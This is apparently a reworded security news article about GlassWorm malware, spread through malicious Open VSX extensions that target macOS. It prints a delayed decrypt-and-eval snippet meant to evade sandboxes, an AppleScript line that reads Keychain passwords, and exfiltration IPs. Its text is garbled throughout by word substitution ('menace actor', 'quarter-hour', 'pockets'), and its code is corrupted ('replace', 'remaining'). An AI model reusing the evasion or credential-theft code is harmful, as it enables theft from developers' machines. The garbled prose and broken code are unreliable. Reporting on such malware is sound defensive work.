A brand new wave of GlassWorm malware has emerged, marking a major shift in focusing on technique from Home windows to macOS programs. This self-propagating worm, distributed by malicious VS Code extensions on the Open VSX market, has already amassed over 50,000 downloads.
The fourth wave introduces a number of regarding adjustments together with encrypted payloads, {hardware} pockets trojanization capabilities, and complicated sandbox evasion methods that permit it to bypass conventional safety scanning instruments.
The menace actor behind GlassWorm has confirmed remarkably adaptive, evolving by 4 distinct waves since October. Earlier campaigns relied on invisible Unicode characters and compiled Rust binaries to hide malicious code.
The newest iteration abandons these approaches in favor of AES-256-CBC encrypted JavaScript payloads particularly engineered for macOS environments.
Prettier Professional on open-vsx (Supply – Koi)
Three suspicious extensions have been flagged on the Open VSX market: pro-svelte-extension, vsce-prettier-pro, and full-access-catppuccin-pro-extension, all related by shared infrastructure and encryption keys.
The malware employs a Solana blockchain-based command and management infrastructure that makes takedown efforts almost unimaginable.
By posting transaction memos containing base64-encoded URLs to the blockchain, the attacker maintains decentralized management that can not be disrupted by conventional area blocking.
Researchers traced the infrastructure to IP tackle 45.32.151.157, which was additionally used within the third wave, confirming continuity of the menace actor.
Koi analysts recognized the malware by behavioral evaluation after their threat engine detected uncommon patterns in extension conduct and community communications.
Encrypted Payload and Sandbox Evasion Ways
The fourth wave introduces a intelligent timing mechanism designed to evade automated safety evaluation. As soon as put in, the malicious extension waits precisely quarter-hour earlier than executing its payload.
This delay is crucial as a result of most sandbox environments timeout after 5 minutes, that means the malware seems utterly benign throughout automated scanning.
The code comprises a hardcoded worth of 9e5 milliseconds (900,000 milliseconds equals quarter-hour), which triggers the decryption and execution of the AES-256-CBC encrypted payload.
setTimeout(() => {
const decrypted = crypto.createDecipheriv(‘aes-256-cbc’, key, iv);
let payload = decrypted.replace(encryptedData, ‘base64’, ‘utf8’);
payload += decrypted.remaining(‘utf8’);
eval(payload);
}, 9e5);
Encrypted payload execution (Supply – Koi)
The payload itself is embedded at line 64 of the primary extension file, encrypted with a hardcoded key and initialization vector that is still constant throughout all three malicious extensions.
This shared cryptographic infrastructure confirms a single menace actor is accountable for the marketing campaign.
After the delay interval expires, the malware retrieves the present command-and-control endpoint from the Solana blockchain and executes any directions it receives.
The macOS-specific payload consists of AppleScript for stealth execution, LaunchAgents for persistence somewhat than Home windows Registry keys, and direct entry to the macOS Keychain database to retrieve saved passwords and credentials.
set keychainPassword to do shell script “safety find-generic-password -s ‘password_service’ -w”
The malware additionally consists of the potential to exchange {hardware} pockets purposes with trojanized variations, focusing on each Ledger Reside and Trezor Suite.
Whereas the pockets substitute performance was not absolutely energetic throughout testing on December 29, 2025, the code infrastructure is full and awaiting payload uploads.
The malware validates that downloaded information exceed 1000 bytes earlier than set up, stopping damaged installations which may alert victims.
All stolen information will get staged within the momentary listing /tmp/ijewf/, compressed, and despatched to the exfiltration server at 45.32.150.251/p2p for attacker retrieval.
Comply with us on Google Information, LinkedIn, and X to Get Extra Immediate Updates, Set CSN as a Most popular Supply in Google.
